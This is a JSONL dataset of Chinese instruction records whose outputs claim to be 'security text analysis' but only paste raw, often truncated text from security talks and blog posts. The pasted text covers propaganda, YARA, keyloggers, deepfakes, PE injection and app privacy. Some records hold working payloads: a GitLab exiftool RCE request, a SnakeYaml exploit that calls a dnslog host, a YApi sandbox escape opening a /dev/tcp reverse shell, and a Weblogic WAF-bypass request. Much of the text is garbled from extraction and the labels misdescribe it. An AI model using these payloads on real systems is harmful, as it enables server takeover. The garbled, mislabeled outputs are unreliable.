{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOverview  Propaganda definition and short history  Propaganda fundamentals  Propaganda in the 4th estate (mainstream media)  Propaganda in 21st century (rise of the machines)  Fighting back  Hardening the human hardware and software  Using our machines to help against the fight  Conclusion remarks  References Propaganda - As defined for this talk  Advertising  Public Relations  Lobbying  Social Engineering  Telemarketing  Soliciting  Manufacturing Consent  Sexting Node A Node B DATA STREAM Benefits ...and it goes by many other names Propaganda - A history  Etymology of the word (from etymonline.com)  \"committee of cardinals in charge of Catholic missionary work,\" short for Congregatio de Propaganda Fide \"congregation for propagating the faith,\" a committee of cardinals established 1622 by Gregory XV to supervise foreign missions Propaganda - A history (cont)  Fast forward to WWI (1914)  First major world power conflict since Napoleon (circa 1799-1815)  Each country needed to think of ways to motivate their populations into fighting a gruesome war of attrition  Adolf Hitler  Recognized that the Germans failed in this department when compared to the British  Germans would do much better the 2nd time around  Edward Bernays  Helped President Wilsons image by sculpting message about spreading democracy  Encouraged by this success, started thinking about how to sell his services and expertise to businesses Propaganda - A history (cont) Propaganda - The Basics  Propaganda - The Basics (cont)  Propaganda - The Basics  ID target audience  ID desired behaviour  Scan for Vulnerabilities  Choose the Theme of the message  Plan for how to grab attention  Test the message, measure impact, adjust the message as needed. Repeat.  Ask if the speaker can gain anything from having you listen to the message  Ask if the source is verified  White - Source is identified  Grey - Source is unidentified  Black - Source is falsified  Ask if the source is credible  Ask if youve heard the message", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 分析 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **僵尸网络** - [白名单之殇Specter僵尸网络滥用ClouDNS服务github.com无辜躺枪](https://mp.weixin.qq.com/s/Wh_8RmPRmk7DhE1LZ6m-zQ) - [一个藏在我们身边的巨型僵尸网络 Pink](https://blog.netlab.360.com/pinkbot/) - [RobinBot快速扩张中的新型 DDoS 僵尸网络](https://mp.weixin.qq.com/s/CQgBh46m3aU1ZDs503M8AQ) **威胁分析** - [APT29觊觎全球情报的国家级黑客组织中](https://mp.weixin.qq.com/s/Ln7iBm-Go17CQhIaRNHD0Q) - [Operation(Đường chín đoạn) typhoon觊觎南海九段线的赛博海莲](https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ) --- ## 分析工具 **相关工具** - [fireeye/capa](https://github.com/fireeye/capa) ### Yara YARA 是一款旨在帮助恶意软件研究人员识别和分类恶意软件样本的规则模板由 virustotal 的软件工程师 Victor M. Alvarezk 开发使用 YARA 可以基于文本或二进制模式创建恶意软件家族描述信息 - 项目地址 : https://github.com/VirusTotal/yara - 语法库 : https://yara.readthedocs.io/en/latest/ **相关文章** - [Yara入门如何通过Yara规则匹配CobaltStrike恶意样本](https://www.anquanke.com/post/id/211501) - [YARA抗击恶意代码的神兵利器](https://www.freebuf.com/articles/system/26373.html) - [恶意软件模式匹配利器 - YARA](https://www.freebuf.com/articles/96903.html) **辅助工具** - [CERT-Polska/mquery](https://github.com/CERT-Polska/mquery) - YARA恶意软件查询加速器(web前端) - [avast/yari](https://github.com/avast/yari) - 用于辅助调试 YARA 规则的工具 - https://engineering.avast.io/yari-a-new-era-of-yara-debugging/ **规则库** - [InQuest/awesome-yara](https://github.com/InQuest/awesome-yara) - A curated list of awesome YARA rules, tools, and people. - [bartblaze/Yara-rules](https://github.com/bartblaze/Yara-rules) - Collection of private Yara rules. - [Yara-Rules/rules](https://github.com/Yara-Rules/rules) - Repository of yara rules - [Neo23x0/signature-base](https://github.com/Neo23x0/signature-base) - Signature base for my scanner tools - [elastic/protections-artifacts](https://github.com/elastic/protections-artifacts) - Elastic Security detection content for Endpoint --- ### C2 分析 **相关文章** - [Understanding & Detecting C2 Frameworks  BabyShark](https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845) **cs蓝队反制** - [cs蓝队反制](..", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to secure the keyboard chain DEF CON 23 Paul Amicelli - Baptiste David - CVO Esiea-Ouest c Creative Commons 2.0 - b Attribution - n NonCommercial - a ShareAlike 1 / 25 The Talk 1. Background 2. Keyloggers forms 3. Main idea of our work 4. Details of our work 5. To go further 6. Finally. Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 2 / 25 Keyloggers -- \"A keylogger is a little piece of software or hardware, which is able to retrieve every keystrokes on a computer\" Background Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 3 / 25 User mode ones Easy to developp, and really efficient Quite easy to detect and remove Keyloggers Forms Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 4 / 25 Kernel mode ones Quite hard to develop and really, really efficient Not easy to detect and quite hard to remove Keyloggers Forms Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 5 / 25 Hardware ones Require physical access to the computer, but the most efficient technic Software-undetectable, sometimes easy to remove, sometimes not Keyloggers Forms Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 6 / 25 Proposed solution Encrypt keystrokes As close as possible to the hardware Jamming keyloggers Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 7 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 8 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 9 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 10 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 11 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 12 / 25 Basic Understanding Our work - Main Idea Paul Amicelli - Baptiste David - CVO Esiea-Ouest - cbna 13 / 25 Keyboard driver stack Our work - Details Paul Amice", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 CVE-OLON-OOOLS Gitlab 前台RCE 分析 之 L NO L起因 Nexiftool 的调点 O授权认证问题 与 CSRF P扩展利 起因在于 有师傅私信提问了所以周末研究了下另外有 章第3部分是基于此篇的扩展相前 家所熟知的利会更简便也更通等明天另发篇 0起因 2 从 Github 上搜 https://github.com/search?q=CVE-2021-22205 以及 绝部分使的 家所熟 知的上传的 第个 请求包概如下 3 从这个请求包第直觉有两个问题 1gitlab 是如何调 exiftool 的 2/uploads/user 接是如何做认证授权的 以及 CSRF 补丁在 workhorse/internal/upload/rewrite.go:180 1exiftool 的调点 Plain Text 复制代码 POST /uploads/user HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: application/json Connection: close X-CSRF-Token: g0heOBs+YzUAWceQolmjKrXO8nGNJkRV3oXYrnOkECztLMEGnoLeLmeDsR6MorfD2UIRO1Pt8TsXF OB70NCTwQ== Referer: http://127.0.0.1:3000//uploads/user Cookie: _gitlab_session_af96fb58ed2fa1b0750f77450f6ea19a32b8a66817cff2290ccd5d460dda8 777=8a02e014393906f0bff9fc22a2e2bc6e; experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IkltRXdOREk1TWpJNExXRT BZVFV0TkdVNE9DMWlOekF4TFRJMlpUYzJNV1k1WlRNd1pTST0iLCJleHAiOm51bGwsInB1ciI6ImN vb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D- -42e8f07fbe964e06f9700f975a122a4dcb59fdc5; perf_bar_enabled=true Content-Length: 305 Content-Type: multipart/form-data; boundary=6dd36a93b958b399f3e98685816fadfa --6dd36a93b958b399f3e98685816fadfa Content-Disposition: form-data; name=\"file\"; filename=\"b9c18b38-3e5d-11ec- b93b-1c36bbed31f3.jpg\" Content-Type: image/jpeg AT&TFORM[DJVUINFO , BGjpANTa5(metadata (Copyright \"\\ \" . qx{whoami} . \\ \" b \") ) --6dd36a93b958b399f3e98685816fadfa-- 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 4 在 handleExifUpload 中 新增对 图格式 的检测 jpeg 以及 exif 5 从上图 可以看到 这代码 在 gitlab-workhorse 中 workhorse/internal/upload/exif/exif.go:34 在 startProcessing 进处理时调 exiftool 触发了 rce Plain Text 复制代码 cleaner, err := exif.NewCleaner(ctx, r) 1 6 因此如果有做 侵检测的朋友实际调的命令为 步步回溯调链可以追溯到 accelerate.go:20 中的 Accelerate 函数 2授权认证问题 与 CSRF Plain Text 复制代码 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP- iptcExt:all -tagsFromFile @ -Re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFace Swapping Video Detection with CNN Wang Yang, Junfeng Xiong, Liu Yan, Hao Xin, Wei Tao Baidu X-Lab Face Swapping Video Detection with CNN  Deepfakes video  A simple and effective CNN  Face recognition based method Deepfakes Video When Face Recognition Systems Meet Deepfakes Vulnerable face comparison before fake faces  Microsoft Azure azure.microsoft.com Similarity 86.0% Similarity 70.5% Real Fake When Face Recognition Systems Meet Deepfakes Similarity 95.1% Similarity 87.3% Vulnerable face comparison before fake faces  Amazon AWS aws.amazon.com Real Fake Face Swapping Video Generation Characteristics  Swap victims face in every frame independently  Not End2End  Only manipulate central face area  Autoencoder Deepfakes Training Phase Deepfakes Generation Phase  Convert  Person A Encoder -> Person B Decoder  Merge back  Gaussian Blur/Color Average  Poisson Image Editing Face Swapping Video Detection with CNN  Deepfakes video  A simple and effective CNN  capturing low-level features of the images  Face recognition based method A Simple and Effective CNN Design purpose  Input contains marginal(background) information.  Capture low-level features of the images. margin (background) face area A Simple and Effective CNN Training  Dataset from VidTIMIT  67600 fake faces and 66629 real faces  low quality and high quality images  Cropped faces  with face landmark detector MTCNN  obtain 1.5 scaled bounding box  Augmented data  horizontal flipping  randomly zooming  shearing transformations A Simple and Effective CNN Characteristics  3 convolution layers  Accuracy rate: 99% Face Swapping Video Detection with CNN  Deepfakes video  A simple and effective CNN  Face recognition based method  capturing high-level features of faces What is FaceNet? Characteristics  SOTA CNN for face recognition  Model structure  Triple Loss FaceNet: A unified embedding for face recognition and clustering A FaceNet based SVM Classifier Training  Central face area  No margin/background  Only face ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJohn Shaw, Wisconsin DOT, 2013 Federal Highway Administration, 2013 Non-Significant Address Part (NAP) Upper Address Part (UAP) Lower Address Part (LAP) 00:00 09 4E:22:19 Manufacturer-assigned, irrelevant Can be derived from traffic Sent in every packet University of Washington STAR Lab Washington State Transportation Center, 2011 University of Washington STAR Lab Edward Snowden by way of the Washington Post", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 迷宫问题 迷宫问题有以下特点: * 在内存中布置一张\"地图\" * 将用户输入限制在少数几个字符范围内. * 一般只有一个迷宫入口和一个迷宫出口 布置的地图可以由可显字符(比如`#`和`*`)组合而成(这非常明显, 查看字符串基本就知道这是个迷宫题了.), 也可以单纯用不可显的十六进制值进行表示. 可以将地图直接组成一条非常长的字符串, 或是一行一行分开布置. 如果是一行一行分开布置的话, 因为迷宫一般都会比较大, 所以用于按行(注意, 布置并非按顺序布置, 每行都对应一个具体的行号, 你需要确定行号才能还原迷宫地图)布置迷宫的函数会明显重复多次. 而被限制的字符通常会是一些方便记忆的组合(不是也没办法), 比如`w/s/a/d`, `h/j/k/l`, `l/r/u/d`这样的类似组合. 当然各个键具体的操作需要经过分析判断(像那种只用一条字符串表示迷宫的, 就可以用`t`键表示向右移动`12`个字符这样). 对于二维的地图, 一般作者都会设置一个`X坐标`和一个`Y坐标`用于保存当前位置. 我们也可以根据这个特点来入手分析. 一般情况下, 迷宫是只有1个入口和1个出口, 像入口在最左上角`(0, 0)`位置, 而出口在最右下角`(max_X, max_Y)`处. 但也有可能是出口在迷宫的正中心, 用一个`Y`字符表示等等. 解答迷宫题的条件也是需要根据具体情况判断的. 当然迷宫的走法可能不止1条, 也有情况是有多条走法, 但是要求某一个走法比如说代价最小. 那么这就可以变相为一个算法问题. ## Volga Quals CTF 2014: Reverse 100 接下来我们以这道题进行示例, 这是一道简单的迷宫题. 该题对地图按行乱序布置, 使用的字符是`#`和`*`. 对应的`crackme`可以点击此处下载: [rev100](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/maze/2014_volga_quals/rev100) 对应的`idb`可以点击此处下载: [rev100.i64](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/maze/2014_volga_quals/rev100.i64) 我们可以到`.rodata`段用光标选择所有的地图字符串, 按下`shift+E`提取所有的地图数据. 但是目前提取到的地图字符串, 从上往下并非是按顺序的, 因此我们需要回到IDA生成的伪C代码, 获取行号并重新排序组合起来. 最后得到的完整地图如下: 对应的`迷宫地图文件`可以点击此处下载: [maze_array.txt](https://github.com/ctf-wiki/ctf-challenges/blob/master/reverse/maze/2014_volga_quals/maze_array.txt) 再来看迷宫移动所需要的字符: 这里我们知道, 可以使用的字符有`L/R/U/D`, 分别对应于`左/右/上/下`. 再往下看 通过调试是可以知道, 这里其实是每次在用户输入`L/R/U/D`后, 先打印一次你的输入, 然后打印对应的`X/Y坐标`. 而最后的判定成功的条件, 就是当`pos_x == 89 && pos_y == 28`. 那么我们就可以根据上述信息, 获得走出迷宫的路径. 最后得到的迷宫路径就是 ``` RDDRRRRRRRRRRRRRRRRRRDDDDDDDDDDRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRUUUUUULLLLLLLLLDDRRRRRRDDLLLLLLLLLLLLLUURRRUUUUURRRRRRRRRRRRRRRRRRRRRRRRRRDDDDDDDDDDDDDDDRRRRRRRRRRRRRRRRUUUUUUUUUUUUULLLLLLLUUUURRRRRRRRRRRRDDDDDDDDDDDDDDDDDDDLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLUUUURRRRRRRRRRRRRRRRRRRRRDRRRRRRRRRRRRRRUUULLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLDDDDDRRRRRUUURRRRDDDDDLLLLLLLLLDDDDRRRRRRRRRRUUURRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRDDDDDDRRRRRRRRRRRRRRRRRRRRRRRRRRRR ``` #", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-SnakeYaml反序列化 SnakeYaml 基本使用 导包 序列化 MyClass 类 序列化测试 <dependency> <groupId>org.yaml</groupId> <artifactId>snakeyaml</artifactId> <version>1.27</version> </dependency> package test; public class Myclass { String value; public Myclass(String args){ value=args; } public String getValue(){ return value; } } package test; import org.junit.Test; import org.yaml.snakeyaml.Yaml; import java.util.HashMap; public class tes { @Test public void test(){ Myclass obj = new Myclass(\"this is my data\"); HashMap<String, Object> data = new HashMap<>(); data.put(\"Myclass\",obj); Yaml yaml = new Yaml(); String dump = yaml.dump(data); System.out.println(dump); } } 结果 前面的 !! 是用于强制类型转化强制转换为 !! 后指定的类型其实这个和 Fastjson 的 @type 有 着异曲同工之妙用于指定反序列化的全类名 反序列化 yaml 文件 反序列化测试 结果 反序列化漏洞 漏洞复现 POC Myclass: !!test.Myclass {} name:\"zhangsan\" sex:man age:20 id:1000001 package test; import org.junit.Test; import org.yaml.snakeyaml.Yaml; import java.io.InputStream; public class unserial { @Test public void test(){ Yaml yaml = new Yaml(); InputStream resourceAsStream = this.getClass().getClassLoader().getResourceAsStream(\"test.yaml\"); Object load = yaml.load(resourceAsStream); System.out.println(load); } } name:\"zhangsan\" sex:man age:20 id:1000001 结果 上面只是简单的进行 url 访问要想深入利用可以参考该项目yaml反序列化payload SPI机制 SPI 全称为 Service Provider Interface 是一种服务发现机制它通过在 ClassPath 路径 下的 META-INF/services 文件夹查找文件自动加载文件里所定义的类也就是动态为某个接口 寻找服务实现那么如果需要使用 SPI 机制需要在 Java classpath 下的 META-INF/services/ 目录里创建一个以服务接口命名的文件这个文件里的内容就是这个接口的具体的实现类 SPI 实现原理程序会 java.util.ServiceLoder 动态装载实现模块在 META-INF/services 目 录下的配置文件寻找实现类的类名通过 Class.forName 加载进来, newInstance() 反射创建对 象,并存到缓存和列表里面 import org.yaml.snakeyaml.Yaml; public class demo { public static void main(String[] args) { String malicious=\"!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\\\"http://wopjpp.dnslog.cn\\\"]]]]\"; Yaml yaml = new Yaml(); yaml.load(malicious); } } 漏洞分析 前面说到 SPI 会通过 java.util.ServiceLoder 进行动态加载实现而在刚刚的 exp 的代码里面 实现了 ScriptEngineFactory 并在 META-INF", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Introduction PE injections in malware  At various stages of execution, malware may inject its implants to other processes  Typical goals: process impersonation, API hooking  Every malware author wants to avoid dropping the malicious file on the disk, so various flavors of manual loading are deployed  The official Win API does not support loading file from a memory buffer (only from a file)  Almost every malware crypter uses some technique of PE injection PE injections in malware  Crypters https://blog.malwarebytes.com/threat-analysis/2015/12/malware-crypters-the-deceptive-first-layer/ Techniques of PE injection Manual loading of EXE file 1. Map from Raw Format into Virtual Format 2. Apply relocations 3. Fill imports 4. Connect to PEB 5. Execute the code (create a new thread of redirect execution of an existing thread) Process Hollowing 1. Map from Raw Format into Virtual Format 2. Apply relocations 3. Fill imports 4. Connect to PEB 5. Execute the code: redirect the Entry Point Manual PE loading  Process Hollowing https://github.com/hasherezade/libpeconv/tree/master/run_pe Process Doppelganging  Map from Raw Format into Virtual Format (create a Section)  Apply relocations  Fill imports  Execute the code: create the process out of the Section Process Doppelganging  Overview https://github.com/hasherezade/process_doppelganging Transacted Hollowing  Overview Module Overloading  An idea of @TheRealWover  PoC implemented by me  https://github.com/hasherezade/module_overloading  Similar to DLL hollowing, but the implant is not connected to the list of modules (may deceive some tools that search for the artefacts typical for hollowing) Module Overloading 1. Load a target DLL as MEM_IMAGE 2. Load the implant DLL manually (with filling imports) 3. Relocate the implant to the target base 4. Overwrite the target image with the implant 5. Fe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Pregnancy Panopticon Cooper Quintin, Staff Technologist, EFF July 2017 Defcon 25 ELECTRONIC FRONTIER FOUNDATION EFF.ORG 1 Table of Contents Abstract 3 Methods 3 MITM Proxy 4 Jadx and Android Studio 4 Kryptowire 4 Security Issues 5 Code execution and content injection 5 Account Hijacking 6 Unencrypted Requests 6 Privacy Issues 6 Third Party Trackers 6 Pin Locks 8 Unauthenticated Email 8 Information Leaks 9 Files Not Deleted 9 Permissions 10 Conclusion 10 Acknolwledgements 11 Appendix A - Permissions requested by each app 12 Appendix B. - Further Notes 13 ELECTRONIC FRONTIER FOUNDATION EFF.ORG 2 Abstract Womens health is big business. There are a staggering number of applications for Android and iOS which claim to help people keep track of their monthly cycle, know when they may be fertile, or track the status of their pregnancy. These apps entice the user to input the most intimate details of their lives, such as their mood, sexual activity, physical activity, physical symptoms, height, weight, and more. But how private are these apps, and how secure are they in fact? After all, if an app has such intimate details about our private lives, it would make sense to ensure that it is not sharing those details with anyone, such as another company or an abusive family member. To this end, EFF and Gizmodo reporter Kashmir Hill have taken a look at some of the privacy and security properties of nearly twenty different fertility and pregnancy tracking applications. While this is not a comprehensive investigation of these applications by any means, we did uncover several privacy issues, some notable security flaws, and a few interesting security features in the applications we examined. We conclude that while these applications may be fun to use, and in some cases useful to the people who need them, women should carefully consider the privacy and security tradeoffs before deciding to use any of these applications. This document is a technical supplement to What Happens When", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYApi 未授权用户创建&Mock远程命令执行漏洞 一漏洞信息 监测到互联网上出现Yapi远程代码执行漏洞利用PoCYApi 提供了编写JS 脚本方式来提供自定义mock 功能JS脚本运行在NodeJs沙盒上由于官方的沙盒只是为了隔离上下文并不提供任何安全保证攻 击者通过精心构造的Javascript代码可以绕过沙盒并用于执行任意系统命令从而导致远程代码执行漏 洞由于Yapi管理平台默认开放注册攻击者可以注册任意用户进行漏洞利用 建议受影响用户关闭用户注册进行防御并删除用户列表中的不明用户并等待官方补丁发布 二漏洞危害 YApi 提供了编写JS 脚本方式来提供自定义mock功能JS脚本运行在NodeJs沙盒上由于官方的沙盒只 是为了隔离上下文并不提供任何安全保证攻击者通过精心构造的Javascript代码可以绕过沙盒并用于 执行任意系统命令从而导致远程代码执行漏洞由于Yapi管理平台默认开放注册攻击者可以注册任 意用户进行漏洞利用 影响版本 <=V1.92 All Sumap\"YApi\" FOFA\"YApi\" 三漏洞复现 1登录注册后添加一个项目 2然后选择设置全局的mock脚本设置命令为远程访问我的服务器地址 3添加接口访问接口的mock地址 反弹shell成功可接管服务器 POC 四修复方案 截止到通告日目前Yapi官方仓库还没有发布相关的修复补丁建议受影响用户临时关闭用户注册进行 防御并删除用户列表中的不明用户并等待官方补丁发布 禁止注册方式如下 在 config.json 添加 closeRegister:true 配置项禁止用户注册 yapi 平台修改完成后重启 yapi 服务 器 const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require(\"child_process\").execSync(\"/bin/bash -i > /dev/tcp/Your ip/Port 0<& 2>&1\").toString() { \"port\": \"*****\", \"closeRegister\":true }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploiting Internet Surveillance Systems Defcon 18, 2010 Decius The Great Debate How should the information infrastructure of the future balance the individuals desire for privacy with the states interest in monitoring suspected criminals? Steve Jackson Games Communications Assistance for Law Enforcement Act Communications Assistance for Law Enforcement Act  Passed in 1994  Requires Telecommunications Companies to cooperate with the interception of traffic on their networks by providing technical interfaces for that purpose  Originally did not apply to Information Services. In 2005 the FCC ruled that CALEA applies to broadband Internet providers  The Cisco Architecture for Lawful Intercept pre-dated this ruling  By 2005 Some European countries already required these interfaces for Internet networks  Providers may voluntarily create these interfaces even when not required to  The provider is going to have to grant access to the communications somehow  A well defined interface makes wiretapping less disruptive to network operations IETF Policy on Wiretapping (RFC 2804) The IETF will not consider requirements for wiretapping in protocol designs  The IETF is an international body and cant address the laws of every country  Wiretapping the Internet is either easy or its impossible  RFC 1984  Development of the Internet requires wide availability of strong cryptographic technology  The Internet should be free from security loopholes  Adding a requirement for wiretapping makes protocols more complex  Complexity begets vulnerability  The interfaces that provide wiretap access could be used with authorization  On the other hand, wiretapping technologies should be openly described  The IETF believes that the publication of such mechanisms, and the publication of known weaknesses in such mechanisms, is a Good Thing.  In keeping with this philosophy, Cisco and the IETF published RFC 3924  The Cisco Architecture for Lawful Intercept in IP networks The Cisco Architecture for Lawf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Find 12 Kernel Information Disclosure Vulnerabilities in 3 Months Tanghui Chen, Long Li | Baidu Security Lab 2019 Contents 0. Who am I? 1. Understanding Vulnerabilities 2. Vulnerability Analysis  Heap and stack data poisoning  Vulnerability detection techniques  CVE Analysis 3. Results Who am I?  Senior Security R&D Engineer at Baidu Security Lab  Has been engaged in Windows Kernel Security Development for years  Rootkit expert  Accidentally involved in the field of vulnerability research Tanghui Chen chenhui00530@163.com What is the Kernel Information Disclosure Vulnerability? There are many information disclosure vulnerabilities in Windows kernel that may lead to the ASLR bypass or critical system information disclosure, which can be exploited by attackers to reveal confidential information such as:  Encryption keys  Kernel objects  Key kernel module addresses   Root Causes of the Vulnerability CVE-2018-8443 1. Call ZwDeviceIoControlFile (..., 0x7d008004, Output,) in user mode 2. ZwDeviceIoControlFile switches to kernel mode after system call 3. Output contains the uninitialized data in kernel stack after returning to the user mode System Calls Information Disclosure Memory Space API/Interface Interface Uninitialized data Kernel Object Pointer Module Base Address  Existing Vulnerability Mining Techniques  BochsPwn  CPU emulator  DigTool  Heavyweight VT techniques  Instrumentation Discovering Information Disclosure Vulnerability 1.Poison kernel heap and stack data, and fill padding flag data 2.Data is checked at a certain time when the application layer memory is written. If there is padding flag data in the memory, its possible a vulnerability exists. 3. Analyze and confirm the vulnerability Memory Checkpoint Detect 1. Stack/Heap Poisoning 2. Data Detection 3. Vulnerability Analysis Step 1: Heap/Stack Data Poisoning Techniques  Hook KiFastCallEntry, Kernel Stack Poisoning  Hook ExAllocatePoolWithTag, Kernel Heap Poisoning  Fill the heap and stack memory dat", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n(maybe ?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Malware.lu July 2013 @r00tbsd  Paul Rascagnères (maybe ?)APT1: technical backstage (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Plan - Malware.lu presentation - Information gathering - Poison Ivy - Take-over of the C&C - Terminator - Taiwan discoveries (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu About malware.lu Presentation of malware.lu Mainteners: - @r00tbsd  Paul Rascagnères - @y0ug  Hugo Caron - @defane  Stephane Emma - MiniLX  Julien Maladrie - @maijin212  Maxime Morin (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu A few numbers Here are some numbers about malware.lu - 5,572,872 malware samples - 41 articles - complete analysis of Red October & Rannoh - 2000 users - 2550 followers on twitter (@malwarelu) - 7GB of database - 3,5TB of malware - 1 tool: malwasm - 1 company: CERT, consulting, Reverse Engineering, Malware analysis, intelligence - and more (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Before starting Why maybe... Concerning the attribution ?? (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Plan - Malware.lu presentation - Information gathering - Poison Ivy - Take-over of the C&C - Terminator - Taiwan discoveries (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Information gathering Mandiant report (http://intelreport.mandiant.com): The remote administration tool Poison Ivy is mentioned. (maybe?)APT1 : technical backstage @r00tbsd  Paul Rascagnères from Malware.lu Information gathering Our Poison Ivy scanner: def check_poison(self, host, port, res): try: af, socktype, proto, canonname, sa = res s = socket.socket(af, socktype, proto) s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass WAF 些姿势 前 WAF 除了对 post 的 payload 进检测此外还有个功能是对访问的 URL 路径进限制例如些敏感路径 Weblogic CVE-2019-2725 的 /_async/AsyncResponseService /_async/AsyncResponseService CVE-2017-10271 的 /wls- /wls- wsat/CoordinatorPortType* wsat/CoordinatorPortType* 等这样可以缓解些 weblogic 版本法升级或打补丁的窘境但是在最近 次监控告警中发现某品牌 WAF 被绕过成功上传 webshell  访问控制绕过 WAF 规则限制访问 /_async/* /_async/* , 直接访问 http://x.x.x.x/_async/AsyncResponseService  响应但是如果 对 HTTP 头进改造 注意 http 请求中在原本协议版本 HTTP 1.1 HTTP 1.1 后添加了 /../../_async/AsyncResponseService /../../_async/AsyncResponseService HTTP/1.1 HTTP/1.1 对该报进重放时发现原本法访问的敏感录可以重新被访问了 GET GET // HTTP/1.1 /../../_async/AsyncResponseService HTTP/1.1 HTTP/1.1 /../../_async/AsyncResponseService HTTP/1.1 Host: Host: 127.0.0.1 127.0.0.1 Upgrade-Insecure-Requests: Upgrade-Insecure-Requests: 1 1 User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a png,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 png,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: Accept-Encoding: gzip, deflate gzip, deflate Accept-Language: Accept-Language: zh-CN,zh;q=0.9 zh-CN,zh;q=0.9 Connection: Connection: close close 绕过原理 直到写章之前我也没意识到为什么可以绕过 WAF 的访问限制同时 weblogic 还可以正常解析但是对正常 的响应报和绕过 WAF 的响应报突然发现weblogic 在解析请求对于 URL 部分的匹配条件更宽松些如 下是响应包对 通过对可以看出weblogic 在定位请求的 URL 部分选取了第个请求法与最后个协议版本中间部分的内 容中间的内容即使有空格也被转译成 ++ 号因此重新审视 bypass WAF 的请求weblogic 会认为 URL 为 http://x.x.x.x/%20HTTP/1.1%20/../../_async/AsyncResponseService 